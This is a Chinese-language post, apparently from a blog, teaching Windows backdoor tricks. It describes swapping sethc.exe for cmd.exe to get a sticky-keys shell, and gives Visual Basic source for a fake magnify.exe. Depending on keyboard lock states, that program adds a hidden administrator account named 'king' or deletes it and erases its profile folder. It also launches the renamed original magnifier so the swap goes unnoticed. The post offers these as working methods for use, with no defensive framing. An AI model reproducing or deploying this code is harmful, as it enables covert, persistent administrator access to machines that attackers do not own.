后门小技巧（系统工具利用）

学到的几个留下后门的小方法。

1.粘滞带后门

这个应该是大家都比较熟悉的了，打开粘滞带就是连按5下shift 会默认打开sethc.exe这个小工具。直接将CMD.EXE替换掉sethc.exe这样就算一个小后门了。

不过貌似用这个的人确实很多，所以出现了网上许多人的加密版本。

2.其他系统工具的利用

其实其他快捷键能呼出的系统工具一般都是可以利用的。这里看到的是利用系统的放大镜功能，就是magnify.exe。

利用GetKeyState（）这个函数检查键盘上的几个特殊键的状态，来执行shell命令添加系统账号。

利用VB编写一段小程序就可以了，届时替换掉系统中的magnify.exe就可以了，不过记得把原程序改名，不然不能启动一下就被发现了。比如将原程序写成mag.exe

VB代码：

Declare Function GetKeyState Lib “user32″ (ByVal nVirtKey As Long) As Integer
Sub Main()
If GetKeyState(20) = 1 Then
If GetKeyState(144) = 1 Then
If GetKeyState(145) = 1 Then
Shell (“net1 user king king /add”)
Shell (“net1 localgroup administrators king /add”)
ElseIf GetKeyState(145) = 0 Then
Shell (“net1 user king /del”)
Shell (“cmd.exe /c rd /s /q \\.\\c:\docume~1\king“)
ElseIf GetKeyState(144) = 1 Then
Shell (“mag.exe”)
ElseIf GetKeyState(20) = 1 Then
Shell (“mag.exe”)
End If
End If
End If
End Sub